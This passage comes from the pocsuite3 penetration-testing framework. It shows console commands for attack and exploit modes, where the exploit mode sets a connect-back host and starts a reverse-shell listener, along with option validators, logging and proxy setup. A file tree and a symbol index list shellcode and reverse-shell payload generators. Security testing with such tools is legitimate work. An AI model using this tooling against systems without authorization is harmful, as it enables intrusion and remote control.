def command_verify(self, *args, **kwargs):
self.command_check(args, kwargs)
@module_required
def command_attack(self, *args, **kwargs):
# 检测必须参数是否被设置
self.current_module.check_requirement(self.current_module.global_options, self.current_module.options)
self._set_global_conf()
self._attack_mode("attack")
@module_required
def command_run(self, *args, **kwargs):
self.command_attack(args, kwargs)
@module_required
def command_exploit(self, *args, **kwargs):
self.current_module.check_requirement(self.current_module.payload_options, self.current_module.global_options)
self._set_global_conf()
conf.connect_back_host = self.current_module.getp_option("lhost")
conf.connect_back_port = self.current_module.getp_option("lport")
conf.mode = "shell"
conf.ipv6 = is_ipv6_address_format(conf.connect_back_host)
_set_listener()
self._attack_mode("shell")
@module_required
def command_shell(self, *args, **kwargs):
self.command_exploit(args, kwargs)
@module_required
def command_setg(self, *args, **kwargs):
key, _, value = args[0].partition(" ")
if key in self.current_module.global_options:
self.current_module.setg_option(key, value)
logger.info("{} => {}".format(key, value))
else:
logger.error("You can't set option '{}'.\n"
"Available options: {}".format(key, self.current_module.options))
def command_list(self, *args, **kwargs):
# 展现所有可用的poc
search_result = []
tb = prettytable.PrettyTable(["Index", "Path", "Name"])
index = 0
for tmp_module in self.main_modules_dirs:
found = os.path.join(self.module_parent_directory, tmp_module + ".py")
if not os.path.exists(found):
found = os.path.join(self.module_parent_directory, tmp_module + ".yaml")
code = get_file_text(found)
name = get_poc_name(code)
tb.add_row([str(index), tmp_module, name])
search_result.append(tmp_module)
index += 1
data_to_stdout("\n" + tb.get_string() + "\n")
self.last_search = search_result
def _show_all(self, *args, **kwargs):
if self.current_module is None:
self.command_list(args, kwargs)
else:
self._show_info(args, kwargs)
self._show_options(args, kwargs)
@module_required
def _show_info(self, *args, **kwargs):
fields = ["name", "VulID", "version", "author", "vulDate", "createDate", "updateDate", "references",
"appPowerLink", "appName", "appVersion", "vulType", "desc"]
msg = ""
for field in fields:
value = getattr(self.current_module, field, None)
if value:
value = str(value).strip()
# for name highlight
if field == "name":
value = colored(value, "green")
msg = msg + "%-20s %-10s\n" % (field, value)
data_to_stdout("\n")
data_to_stdout(msg)
data_to_stdout("\n")
@module_required
def _show_options(self, *args, **kwargs):
global_options = self.current_module.global_options
module_options = self.current_module.options
payload_options = self.current_module.payload_options
tb2 = prettytable.PrettyTable(["Name", "Current settings", "Type", "Descript"])
for name, opt in global_options.items():
value = opt.value
if opt.require and value == "":
value = colored("*require*", "red")
tb2.add_row([name, value, opt.type, opt.description])
data_to_stdout("\nTarget options:\n")
data_to_stdout(tb2.get_string())
data_to_stdout("\n")
if module_options:
tb = prettytable.PrettyTable(["Name", "Current settings", "Type", "Descript"])
# add target option
for name, opt in module_options.items():
value = opt.value
if opt.require and value == "":
value = colored("*require*", "red")
tb.add_row([name, value, opt.type, opt.description])
data_to_stdout("\nModule options:\n")
data_to_stdout(tb.get_string())
data_to_stdout("\n")
# exploit payload
if payload_options:
tb3 = prettytable.PrettyTable(["Name", "Current settings", "Type", "Descript"])
for name, opt in payload_options.items():
value = opt.value
if opt.require and value == "":
value = colored("*require*", "red")
tb3.add_row([name, value, opt.type, opt.description])
data_to_stdout("\nPayload options (reverse_tcp):\n")
data_to_stdout(tb3.get_string())
data_to_stdout("\n")
data_to_stdout("\n")
@stop_after(2)
def complete_use(self, text, *args, **kwargs):
if text:
all_possible_matches = filter(lambda x: x.startswith(text), self.main_modules_dirs)
matches = set()
for match in all_possible_matches:
head, sep, tail = match[len(text):].partition('.')
if not tail:
sep = ""
matches.add("".join((text, head, sep)))
return list(matches)
else:
return self.main_modules_dirs
@stop_after(2)
def complete_show(self, text, *args, **kwargs):
if text:
all_possible_matches = filter(lambda x: x.startswith(text), self.show_sub_commands)
return list(all_possible_matches)
else:
return self.show_sub_commands
@module_required
@stop_after(2)
def complete_set(self, text, *args, **kwargs):
all_options = self.current_module.get_options().keys()
if text:
all_possible_matches = filter(lambda x: x.startswith(text), all_options)
return list(all_possible_matches)
else:
return []
================================================
FILE: pocsuite3/lib/core/interpreter_option.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2018/12/26 下午2:53
# @Author : chenghs
# @File : interpreter_option.py
from pocsuite3.lib.core.common import is_ipv6_address_format, is_ip_address_format
from pocsuite3.lib.core.exception import PocsuiteValidationException
class Option(object):
""" Exploit attribute that is set by the end user """
def __init__(self, default, description="", require=False):
self.description = description
self.require = require
self.display_value = default
if default:
self.__set__("", default)
else:
self.value = ""
def __get__(self, instance, owner):
return self.value
# def __getattr__(self, name):
# try:
# return self[name]
# except KeyError:
# raise AttributeError(name)
# def __setattr__(self, name, value):
# self[name] = value
def __iter__(self):
# first start by grabbing the Class items
iters = dict((x, y) for x, y in Option.__dict__.items() if x[:2] != '__')
# then update the class items with the instance items
iters.update(self.__dict__)
# now 'yield' through the items
for x, y in iters.items():
yield x, y
class OptIP(Option):
""" Option IP attribute """
def __init__(self, default, description="", require=False):
super().__init__(default, description, require)
if description == "":
self.description = "IPv4 or IPv6 address"
self.type = "Ip"
def __set__(self, instance, value):
if not value or is_ip_address_format(value) or is_ipv6_address_format(value):
self.value = self.display_value = value
else:
raise PocsuiteValidationException("Invalid address. Provided address is not valid IPv4 or IPv6 address.")
class OptPort(Option):
""" Option Port attribute """
def __init__(self, default, description="", require=False):
super().__init__(default, description, require)
if description == "":
self.description = "The target port"
self.type = "Port"
def __set__(self, instance, value):
try:
value = int(value)
if 0 <= value <= 65535: # max port number is 65535
self.display_value = str(value)
self.value = value
else:
raise PocsuiteValidationException("Invalid option. Port value should be between 0 and 65536.")
except ValueError:
raise PocsuiteValidationException("Invalid option. Cannot cast '{}' to integer.".format(value))
class OptBool(Option):
""" Option Bool attribute """
def __init__(self, default, description="", require=False):
super().__init__(default, description, require)
if default:
self.display_value = "true"
else:
self.display_value = "false"
self.value = default
self.type = "Bool"
def __set__(self, instance, value):
if isinstance(value, bool):
self.value = value
return
if value.lower() == "true":
self.value = True
self.display_value = value
elif value.lower() == "false":
self.value = False
self.display_value = value
else:
raise PocsuiteValidationException("Invalid value. It should be true or false.")
class OptInteger(Option):
""" Option Integer attribute """
def __init__(self, default, description="", require=False):
super().__init__(default, description, require)
self.type = "Integer"
def __set__(self, instance, value):
try:
self.display_value = str(value)
self.value = int(value)
except ValueError:
raise PocsuiteValidationException("Invalid option. Cannot cast '{}' to integer.".format(value))
class OptFloat(Option):
""" Option Float attribute """
def __init__(self, default, description="", require=False):
super().__init__(default, description, require)
self.type = "Float"
def __set__(self, instance, value):
try:
self.display_value = str(value)
self.value = float(value)
except ValueError:
raise PocsuiteValidationException("Invalid option. Cannot cast '{}' to float.".format(value))
class OptString(Option):
""" Option String attribute """
def __init__(self, default, description="", require=False):
super().__init__(default, description, require)
self.type = "String"
def __set__(self, instance, value):
try:
self.value = self.display_value = str(value)
except ValueError:
raise PocsuiteValidationException("Invalid option. Cannot cast '{}' to string.".format(value))
class OptItems(Option):
def __init__(self, default, description="", selected="", require=False):
super().__init__(default, description, require)
self.selected = selected
self.type = "Select"
self.__set__("", selected)
if description == "":
self.description = "You can select {} ,default:{}".format(repr(default), self.selected)
def __set__(self, instance, value):
# if value not in self.default:
# raise PocsuiteValidationException("Cannot set {},you must select {}".format(value, self.default))
self.value = value
class OptDict:
def __init__(self, require=False, selected=False, default={}):
# super().__init__(default, '', require)
self.default = {}
b = ""
for k, v in default.items():
self.default[k] = v
b += "{k}:{v}\n".format(k=k, v=v)
self.selected = selected
self.require = require
self.type = "Dict"
self.__set__("", selected)
self.description = "{}\nYou can select {} ,default:{}".format(b,
repr(self.default.keys()),
self.selected)
def __set__(self, instance, value):
# if value not in self.default:
# raise PocsuiteValidationException("Cannot set {},you must select {}".format(value, self.default))
# self.value = self.display_value = value
self.value = self.default[value] if value in self.default else value
================================================
FILE: pocsuite3/lib/core/log.py
================================================
import sys
import logging
import colorlog
from pocsuite3.lib.core.enums import CUSTOM_LOGGING
logging.addLevelName(CUSTOM_LOGGING.SYSINFO, "*")
logging.addLevelName(CUSTOM_LOGGING.SUCCESS, "+")
logging.addLevelName(CUSTOM_LOGGING.ERROR, "-")
logging.addLevelName(CUSTOM_LOGGING.WARNING, "!")
LOGGER = logging.getLogger("pocsuite")
try:
# for python>=3.7
sys.stdout.reconfigure(encoding='utf-8')
except AttributeError:
# http://www.macfreek.nl/memory/Encoding_of_Python_stdout
import codecs
sys.stdout = codecs.getwriter('utf-8')(sys.stdout.buffer, 'strict')
LOGGER_HANDLER = logging.StreamHandler(sys.stdout)
PRIMARY_FMT = (
"%(cyan)s[%(asctime)s] %(log_color)s[%(levelname)s]%(reset)s %(message)s"
)
CUSTOM_FMT = "%(log_color)s[%(asctime)s] [%(levelname)s] %(message)s"
FORMATTER = colorlog.LevelFormatter(
fmt={
"DEBUG": PRIMARY_FMT,
"INFO": PRIMARY_FMT,
"WARNING": PRIMARY_FMT,
"ERROR": PRIMARY_FMT,
"CRITICAL": PRIMARY_FMT,
"*": CUSTOM_FMT,
"+": CUSTOM_FMT,
"-": CUSTOM_FMT,
"!": CUSTOM_FMT
},
datefmt="%H:%M:%S",
log_colors={
'*': 'cyan',
'+': 'green',
'-': 'red',
'!': 'yellow',
'DEBUG': 'blue',
'INFO': 'green',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'bg_red,white'
},
secondary_log_colors={},
style='%'
)
LOGGER_HANDLER.setFormatter(FORMATTER)
LOGGER.addHandler(LOGGER_HANDLER)
LOGGER.setLevel(logging.INFO)
================================================
FILE: pocsuite3/lib/core/option.py
================================================
import copy
import glob
import logging
import os
import re
import socket
import importlib
from queue import Queue
from urllib.parse import urlsplit
from http.client import HTTPConnection
import docker.errors
import requests
from requests_toolbelt.adapters.socket_options import TCPKeepAliveAdapter
import socks
import prettytable
from termcolor import colored
from pocsuite3.lib.core.clear import remove_extra_log_message
from pocsuite3.lib.core.common import boldify_message, check_file, get_file_items, parse_target, \
get_public_type_members, data_to_stdout
from pocsuite3.lib.core.common import check_path, extract_cookies
from pocsuite3.lib.core.common import get_local_ip, mosaic, get_host_ip
from pocsuite3.lib.core.common import single_time_warn_message
from pocsuite3.lib.core.common import OrderedSet, get_file_text, get_poc_name
from pocsuite3.lib.core.common import index_modules, ltrim
from pocsuite3.lib.core.common import parse_poc_docker_name
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf, cmd_line_options
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import merged_options
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.enums import HTTP_HEADER, CUSTOM_LOGGING, PROXY_TYPE
from pocsuite3.lib.core.exception import PocsuiteSyntaxException, PocsuiteSystemException, PocsuiteHeaderTypeException
from pocsuite3.lib.core.log import FORMATTER
from pocsuite3.lib.core.register import load_file_to_module
from pocsuite3.lib.core.settings import DEFAULT_LISTENER_PORT, CMD_PARSE_WHITELIST
from pocsuite3.lib.core.docker_env import DockerEnv
from pocsuite3.lib.core.statistics_comparison import StatisticsComparison
from pocsuite3.lib.core.update import update
from pocsuite3.lib.core.template import create_poc_plugin_template
from pocsuite3.lib.parse.cmd import DIY_OPTIONS
from pocsuite3.lib.parse.configfile import config_file_parser
from pocsuite3.lib.parse.rules import regex_rule
from pocsuite3.lib.parse.dockerfile import parse_dockerfile
from pocsuite3.lib.request.patch import patch_all
from pocsuite3.lib.request.patch.session_reuse import api_request
from pocsuite3.modules.listener import start_listener
def _resolve_cross_references():
import pocsuite3
pocsuite3.lib.core.revision.stdout_encode = stdout_encode
pocsuite3.lib.core.convert.single_time_warn_message = single_time_warn_message
def set_verbosity():
"""
This function set the verbosity of pocsuite output messages.
"""
HTTPConnection.debuglevel = int(conf.http_debug)
if conf.verbose is None:
conf.verbose = 1
conf.verbose = int(conf.verbose)
if conf.verbose == 0:
logger.setLevel(logging.ERROR)
elif conf.verbose == 1:
logger.setLevel(logging.INFO)
elif conf.verbose == 2:
logger.setLevel(logging.DEBUG)
elif conf.verbose == 3:
logger.setLevel(logging.DEBUG)
logger.setLevel(CUSTOM_LOGGING.SYSINFO)
elif conf.verbose == 4:
logger.setLevel(logging.DEBUG)
logger.setLevel(CUSTOM_LOGGING.WARNING)
elif conf.verbose >= 5:
logger.setLevel(logging.DEBUG)
logger.setLevel(CUSTOM_LOGGING.ERROR)
def _set_http_user_agent():
'''
set user-agent
:return:
'''
if conf.agent:
conf.http_headers[HTTP_HEADER.USER_AGENT] = conf.agent
def _set_http_referer():
if conf.referer:
conf.http_headers[HTTP_HEADER.REFERER] = conf.referer
def _set_http_cookie():
if conf.cookie:
if isinstance(conf.cookie, dict):
conf.http_headers[HTTP_HEADER.COOKIE] = '; '.join(map(lambda x: '='.join(x), conf.cookie.items()))
else:
conf.http_headers[HTTP_HEADER.COOKIE] = conf.cookie
def _set_http_host():
if conf.host:
conf.http_headers[HTTP_HEADER.HOST] = conf.host
def _set_http_extra_headers():
if conf.headers:
conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n")
for header_value in conf.headers:
if not header_value.strip():
continue
if header_value.count(':') >= 1:
header, value = (_.lstrip() for _ in header_value.split(":", 1))
if header and value:
if header not in conf.http_headers:
conf.http_headers[header] = value
def _set_network_timeout():
if conf.timeout:
conf.timeout = float(conf.timeout)
if conf.timeout < 3.0:
warn_msg = "the minimum HTTP timeout is 3 seconds, pocsuite "
warn_msg += "will going to reset it"
logger.warn(warn_msg)
conf.timeout = 3.0
else:
conf.timeout = 10
socket.setdefaulttimeout(conf.timeout)
def _set_network_proxy():
if conf.proxy:
debug_msg = "setting the HTTP/SOCKS proxy for all network requests"
logger.debug(debug_msg)
try:
_ = urlsplit(conf.proxy)
except Exception as ex:
err_msg = "invalid proxy address '{0}' ('{1}')".format(conf.proxy, str(ex))
raise PocsuiteSyntaxException(err_msg)
hostname_port = _.netloc.split(":")
scheme = _.scheme.upper()
hostname = hostname_port[0]
port = None
username = None
password = None
if len(hostname_port) == 2:
try:
port = int(hostname_port[1])
except Exception:
pass
if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)):
err_msg = "proxy value must be in format '({0})://address:port'".format("|".join(
_[0].lower() for _ in get_public_type_members(PROXY_TYPE)))
raise PocsuiteSyntaxException(err_msg)
if conf.proxy_cred:
_ = re.search(r"\A(.*?):(.*?)\Z", conf.proxy_cred)
if not _:
err_msg = "proxy authentication credentials "
err_msg += "value must be in format username:password"
raise PocsuiteSyntaxException(err_msg)
else:
username = _.group(1)
password = _.group(2)
if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5, PROXY_TYPE.SOCKS5H):
socks.set_default_proxy(
socks.PROXY_TYPE_SOCKS4 if scheme == PROXY_TYPE.SOCKS4 else socks.PROXY_TYPE_SOCKS5,
hostname,
port,
username=username,
password=password,
rdns=True if scheme == PROXY_TYPE.SOCKS5H else False,
)
conf.origin_socks = copy.deepcopy(socket.socket) # Convenient behind recovery
socket.socket = socks.socksocket
if conf.proxy_cred:
proxy_string = "{0}@".format(conf.proxy_cred)
else:
proxy_string = ""
proxy_string = "{scheme}://{proxy_string}{hostname}:{port}".format(scheme=scheme.lower(),
proxy_string=proxy_string,
hostname=hostname, port=port)
conf.proxies = {
"http": proxy_string,
"https": proxy_string
}
def _set_session_queue():
requests.api.request = api_request
for _ in range(0, conf.requests_session_reuse_num):
session = requests.Session()
session.headers.update({'Connection': 'keep-alive'})
# https://github.com/psf/requests/issues/6354
keep_alive = TCPKeepAliveAdapter()
session.mount("http://", keep_alive)
session.mount("https://", keep_alive)
kb.session_queue.put(session)
def _set_multiple_targets():
# set multi targets to kb
if conf.url:
for url in conf.url:
for target in parse_target(url, conf.ports, conf.skip_target_port):
kb.targets.add(target)
if conf.url_file:
for line in get_file_items(conf.url_file, lowercase=False, unique=True):
for target in parse_target(line, conf.ports, conf.skip_target_port):
kb.targets.add(target)
if conf.dork:
# enable plugin 'target_from_zoomeye' by default
if ('target_from_shodan' not in conf.plugins and
gitextract_rxnectch/
├── .coveragerc
├── .github/
│ └── workflows/
│ ├── lint.yml
│ ├── pylint.yml
│ ├── release.yml
│ └── test.yml
├── .gitignore
├── CHANGELOG.md
├── CONTRIBUTORS.md
├── COPYING
├── Dockerfile
├── MANIFEST.in
├── README.md
├── docs/
│ ├── CODING.md
│ └── USAGE.md
├── make.bat
├── makefile
├── manpages/
│ ├── poc-console.1
│ └── pocsuite.1
├── pocsuite3/
│ ├── __init__.py
│ ├── api/
│ │ └── __init__.py
│ ├── cli.py
│ ├── console.py
│ ├── data/
│ │ └── password-top100.txt
│ ├── lib/
│ │ ├── __init__.py
│ │ ├── controller/
│ │ │ ├── __init__.py
│ │ │ └── controller.py
│ │ ├── core/
│ │ │ ├── __init__.py
│ │ │ ├── clear.py
│ │ │ ├── common.py
│ │ │ ├── convert.py
│ │ │ ├── data.py
│ │ │ ├── datatype.py
│ │ │ ├── decorators.py
│ │ │ ├── docker_env.py
│ │ │ ├── enums.py
│ │ │ ├── exception.py
│ │ │ ├── interpreter.py
│ │ │ ├── interpreter_option.py
│ │ │ ├── log.py
│ │ │ ├── option.py
│ │ │ ├── optiondict.py
│ │ │ ├── plugin.py
│ │ │ ├── poc.py
│ │ │ ├── readlineng.py
│ │ │ ├── register.py
│ │ │ ├── revision.py
│ │ │ ├── settings.py
│ │ │ ├── shell.py
│ │ │ ├── statistics_comparison.py
│ │ │ ├── template.py
│ │ │ ├── threads.py
│ │ │ └── update.py
│ │ ├── helper/
│ │ │ ├── __init__.py
│ │ │ ├── archieve/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── jar.py
│ │ │ │ ├── memoryzip.py
│ │ │ │ ├── war.py
│ │ │ │ └── zip.py
│ │ │ └── java/
│ │ │ ├── __init__.py
│ │ │ └── serialization.py
│ │ ├── parse/
│ │ │ ├── __init__.py
│ │ │ ├── cmd.py
│ │ │ ├── configfile.py
│ │ │ ├── dockerfile.py
│ │ │ ├── rules.py
│ │ │ └── url.py
│ │ ├── request/
│ │ │ ├── __init__.py
│ │ │ └── patch/
│ │ │ ├── __init__.py
│ │ │ ├── add_httpraw.py
│ │ │ ├── hook_request.py
│ │ │ ├── hook_request_redirect.py
│ │ │ ├── hook_urllib3_parse_url.py
│ │ │ ├── remove_ssl_verify.py
│ │ │ ├── remove_warnings.py
│ │ │ ├── session_reuse.py
│ │ │ └── unquote_request_uri.py
│ │ ├── utils/
│ │ │ ├── __init__.py
│ │ │ ├── markup.py
│ │ │ └── pcap_sniffer.py
│ │ └── yaml/
│ │ ├── __init__.py
│ │ └── nuclei/
│ │ ├── __init__.py
│ │ ├── model/
│ │ │ └── __init__.py
│ │ ├── operators/
│ │ │ ├── __init__.py
│ │ │ ├── extrators/
│ │ │ │ └── __init__.py
│ │ │ └── matchers/
│ │ │ └── __init__.py
│ │ ├── protocols/
│ │ │ ├── __init__.py
│ │ │ ├── common/
│ │ │ │ ├── expressions/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── safe_eval.py
│ │ │ │ ├── generators/
│ │ │ │ │ └── __init__.py
│ │ │ │ ├── interactsh/
│ │ │ │ │ └── __init__.py
│ │ │ │ └── replacer/
│ │ │ │ └── __init__.py
│ │ │ ├── http/
│ │ │ │ └── __init__.py
│ │ │ └── network/
│ │ │ └── __init__.py
│ │ └── templates/
│ │ └── __init__.py
│ ├── modules/
│ │ ├── __init__.py
│ │ ├── censys/
│ │ │ └── __init__.py
│ │ ├── ceye/
│ │ │ └── __init__.py
│ │ ├── fofa/
│ │ │ └── __init__.py
│ │ ├── httpserver/
│ │ │ └── __init__.py
│ │ ├── hunter/
│ │ │ └── __init__.py
│ │ ├── interactsh/
│ │ │ └── __init__.py
│ │ ├── listener/
│ │ │ ├── __init__.py
│ │ │ ├── bind_tcp.py
│ │ │ └── reverse_tcp.py
│ │ ├── quake/
│ │ │ └── __init__.py
│ │ ├── seebug/
│ │ │ └── __init__.py
│ │ ├── shodan/
│ │ │ └── __init__.py
│ │ ├── spider/
│ │ │ └── __init__.py
│ │ └── zoomeye/
│ │ └── __init__.py
│ ├── plugins/
│ │ ├── __init__.py
│ │ ├── file_record.py
│ │ ├── html_report.py
│ │ ├── poc_from_pocs.py
│ │ ├── poc_from_redis.py
│ │ ├── poc_from_seebug.py
│ │ ├── target_from_censys.py
│ │ ├── target_from_cidr.py
│ │ ├── target_from_fofa.py
│ │ ├── target_from_hunter.py
│ │ ├── target_from_quake.py
│ │ ├── target_from_redis.py
│ │ ├── target_from_shodan.py
│ │ ├── target_from_zoomeye.py
│ │ └── web_hook.py
│ └── shellcodes/
│ ├── __init__.py
│ ├── base.py
│ ├── data/
│ │ ├── java/
│ │ │ └── src/
│ │ │ └── ReverseTCP/
│ │ │ └── Payload.java
│ │ ├── linux/
│ │ │ ├── src/
│ │ │ │ ├── bind_tcp.asm
│ │ │ │ └── reverse_tcp.asm
│ │ │ └── x64/
│ │ │ └── src/
│ │ │ ├── bind_tcp.asm
│ │ │ └── reverse_tcp.asm
│ │ └── windows/
│ │ ├── src/
│ │ │ ├── bind_tcp.asm
│ │ │ └── reverse_tcp.asm
│ │ └── x64/
│ │ └── src/
│ │ ├── bind_tcp.asm
│ │ └── reverse_tcp.asm
│ ├── dotnet.py
│ ├── encoder.py
│ ├── generator.py
│ ├── java.py
│ ├── php.py
│ └── python.py
├── requirements.txt
├── setup.cfg
├── setup.py
├── test.py
└── tests/
├── __init__.py
├── login_demo.py
├── test_api_diy_options.py
├── test_api_get_poc_info.py
├── test_build_url.py
├── test_check_install_requires.py
├── test_cmd_diy_options.py
├── test_configfile.py
├── test_generate_shellcode_list.py
├── test_httpserver.py
├── test_import_pocsuite_execute.py
├── test_interactsh_module.py
├── test_nuclei_helper_functions.py
├── test_osshell.py
├── test_parse_target.py
├── test_request_raw.py
├── test_show_poc_options.py
├── test_spier_crawl.py
└── test_webshell.py
SYMBOL INDEX (1122 symbols across 113 files)
FILE: pocsuite3/api/__init__.py
function get_listener_ip (line 54) | def get_listener_ip():
function get_listener_port (line 58) | def get_listener_port():
function get_current_poc_obj (line 62) | def get_current_poc_obj():
function get_poc_options (line 66) | def get_poc_options(poc_obj=None):
function get_results (line 71) | def get_results():
function init_pocsuite (line 75) | def init_pocsuite(options={}):
function start_pocsuite (line 80) | def start_pocsuite():
FILE: pocsuite3/cli.py
function module_path (line 24) | def module_path():
function check_environment (line 31) | def check_environment():
function main (line 41) | def main():
FILE: pocsuite3/console.py
function main (line 19) | def main():
FILE: pocsuite3/lib/controller/controller.py
function runtime_check (line 20) | def runtime_check():
function start (line 27) | def start():
function show_task_result (line 52) | def show_task_result():
function check_docker_status (line 93) | def check_docker_status(target):
function task_run (line 106) | def task_run():
function result_plugins_start (line 229) | def result_plugins_start():
function result_plugins_handle (line 238) | def result_plugins_handle(output):
function result_compare_handle (line 247) | def result_compare_handle():
function task_done (line 257) | def task_done():
FILE: pocsuite3/lib/core/clear.py
function remove_extra_log_message (line 4) | def remove_extra_log_message():
FILE: pocsuite3/lib/core/common.py
function urlparse (line 53) | def urlparse(address):
function read_binary (line 69) | def read_binary(filename):
function check_path (line 76) | def check_path(path):
function check_file (line 80) | def check_file(filename):
function set_paths (line 102) | def set_paths(root_path):
function banner (line 129) | def banner():
function set_color (line 142) | def set_color(message, bold=False):
function clear_colors (line 154) | def clear_colors(message):
function boldify_message (line 161) | def boldify_message(message):
function data_to_stdout (line 169) | def data_to_stdout(data, bold=False):
function extract_regex_result (line 191) | def extract_regex_result(regex, content, flags=0):
function get_latest_revision (line 210) | def get_latest_revision():
function poll_process (line 226) | def poll_process(process, suppress_errors=False):
function parse_target_url (line 249) | def parse_target_url(url):
function is_url_format (line 263) | def is_url_format(value):
function is_domain_format (line 270) | def is_domain_format(value):
function is_ip_address_format (line 277) | def is_ip_address_format(value):
function is_ip_address_with_port_format (line 284) | def is_ip_address_with_port_format(value):
function is_ipv6_address_format (line 291) | def is_ipv6_address_format(value):
function is_ipv6_url_format (line 298) | def is_ipv6_url_format(value):
function is_old_version_poc (line 305) | def is_old_version_poc(poc_string):
function is_pocsuite_poc (line 312) | def is_pocsuite_poc(poc_string):
function is_pocsuite3_poc (line 319) | def is_pocsuite3_poc(poc_string):
function multiple_replace (line 323) | def multiple_replace(text, adict):
function get_filename (line 332) | def get_filename(filepath, with_ext=True):
function get_md5 (line 337) | def get_md5(value):
function extract_cookies (line 343) | def extract_cookies(cookie):
function get_file_items (line 348) | def get_file_items(filename, comment_prefix='#', unicode=True, lowercase...
function parse_target (line 385) | def parse_target(address, additional_ports=[], skip_target_port=False):
function parse_poc_docker_name (line 460) | def parse_poc_docker_name(name):
function single_time_log_message (line 464) | def single_time_log_message(message, level=logging.INFO, flag=None):
function single_time_debug_message (line 473) | def single_time_debug_message(message):
function single_time_warn_message (line 477) | def single_time_warn_message(message):
function get_public_type_members (line 482) | def get_public_type_members(type_, only_values=False):
function is_local_ip (line 499) | def is_local_ip(ip_string):
function get_local_ip (line 506) | def get_local_ip(all=True):
function get_host_ip (line 541) | def get_host_ip(dst='8.8.8.8', check_private=True):
function has_poll (line 572) | def has_poll():
function get_poc_requires (line 576) | def get_poc_requires(code):
function get_poc_name (line 580) | def get_poc_name(code):
function is_os_64bit (line 588) | def is_os_64bit():
function write_file (line 592) | def write_file(data, file_ext='', file_name=''):
function search_file (line 611) | def search_file(filename, search_path):
function get_objective_code (line 621) | def get_objective_code(asm_file, target_arch, debug=0):
function objdump (line 668) | def objdump(obj_file, os_target_arch, debug=0):
function create_shellcode (line 719) | def create_shellcode(asm_code, os_target, os_target_arch, make_exe=0, de...
function generate_dll (line 743) | def generate_dll(os_target, os_target_arch, asm_code, filename, dll_inj_...
function make_binary_from_obj (line 756) | def make_binary_from_obj(o_file, os_target, os_target_arch, debug=0, is_...
function extract_shell_from_obj (line 809) | def extract_shell_from_obj(file):
function replace_by_real_values (line 825) | def replace_by_real_values(shellcode, kwargs):
function ip_to_hex (line 831) | def ip_to_hex(ip, is_big=True):
function port_to_hex (line 838) | def port_to_hex(port, is_big=True):
function validate_ip_addr (line 844) | def validate_ip_addr(addr):
function ip_to_dd (line 853) | def ip_to_dd(addr):
function port_to_dd (line 857) | def port_to_dd(port):
function get_unicode (line 861) | def get_unicode(value):
function rtrim (line 867) | def rtrim(text, char):
function ltrim (line 882) | def ltrim(text, char):
function index_modules (line 897) | def index_modules(modules_directory):
function humanize_path (line 912) | def humanize_path(path: str) -> str:
function pythonize_path (line 924) | def pythonize_path(path: str) -> str:
function module_required (line 936) | def module_required(fn):
function stop_after (line 958) | def stop_after(space_number):
function check_port (line 989) | def check_port(ip, port):
function exec_cmd (line 1004) | def exec_cmd(cmd, raw_data=True):
function mosaic (line 1030) | def mosaic(s):
function encoder_bash_payload (line 1069) | def encoder_bash_payload(cmd: str) -> str:
function encoder_powershell_payload (line 1074) | def encoder_powershell_payload(powershell: str):
function get_host_ipv6 (line 1080) | def get_host_ipv6(dst='2001:db8::'):
class OrderedSet (line 1098) | class OrderedSet(collections.OrderedDict, collectionsAbc.MutableSet):
method add (line 1100) | def add(self, e):
method discard (line 1103) | def discard(self, e):
method __le__ (line 1106) | def __le__(self, other):
method __lt__ (line 1109) | def __lt__(self, other):
method __ge__ (line 1112) | def __ge__(self, other):
method __gt__ (line 1115) | def __gt__(self, other):
method __repr__ (line 1118) | def __repr__(self):
method __str__ (line 1121) | def __str__(self):
function get_file_text (line 1125) | def get_file_text(filepath):
FILE: pocsuite3/lib/core/convert.py
function single_time_warn_message (line 7) | def single_time_warn_message(message):
function stdout_encode (line 16) | def stdout_encode(data):
FILE: pocsuite3/lib/core/datatype.py
class AttribDict (line 4) | class AttribDict(OrderedDict):
method __getattr__ (line 11) | def __getattr__(self, name):
method __setattr__ (line 22) | def __setattr__(self, name, value):
method __delattr__ (line 29) | def __delattr__(self, name):
FILE: pocsuite3/lib/core/decorators.py
function cachedmethod (line 4) | def cachedmethod(f, cache={}):
FILE: pocsuite3/lib/core/docker_env.py
class DockerEnv (line 9) | class DockerEnv:
method __init__ (line 11) | def __init__(self):
method build (line 14) | def build(self, name, docker_file):
method run (line 23) | def run(self, tag_name, docker_file, ports, envs, volumes):
FILE: pocsuite3/lib/core/enums.py
class LOGGING_LEVELS (line 4) | class LOGGING_LEVELS:
class CUSTOM_LOGGING (line 13) | class CUSTOM_LOGGING:
class OUTPUT_STATUS (line 20) | class OUTPUT_STATUS:
class HTTP_HEADER (line 25) | class HTTP_HEADER:
class PROXY_TYPE (line 59) | class PROXY_TYPE:
class ERROR_TYPE_ID (line 67) | class ERROR_TYPE_ID:
class OS (line 76) | class OS:
class OS_ARCH (line 81) | class OS_ARCH:
class ENCODER_TPYE (line 86) | class ENCODER_TPYE:
class SHELLCODE_TYPE (line 94) | class SHELLCODE_TYPE:
class SHELLCODE_CONNECTION (line 103) | class SHELLCODE_CONNECTION:
class PLUGIN_TYPE (line 108) | class PLUGIN_TYPE:
class AUTOCOMPLETE_TYPE (line 114) | class AUTOCOMPLETE_TYPE:
class POC_CATEGORY (line 122) | class POC_CATEGORY:
class OPTION_TYPE (line 154) | class OPTION_TYPE:
class VUL_TYPE (line 161) | class VUL_TYPE:
FILE: pocsuite3/lib/core/exception.py
class PocsuiteBaseException (line 4) | class PocsuiteBaseException(Exception):
class PocsuiteUserQuitException (line 8) | class PocsuiteUserQuitException(PocsuiteBaseException):
class PocsuiteShellQuitException (line 12) | class PocsuiteShellQuitException(PocsuiteBaseException):
class PocsuiteDataException (line 16) | class PocsuiteDataException(PocsuiteBaseException):
class PocsuiteGenericException (line 20) | class PocsuiteGenericException(PocsuiteBaseException):
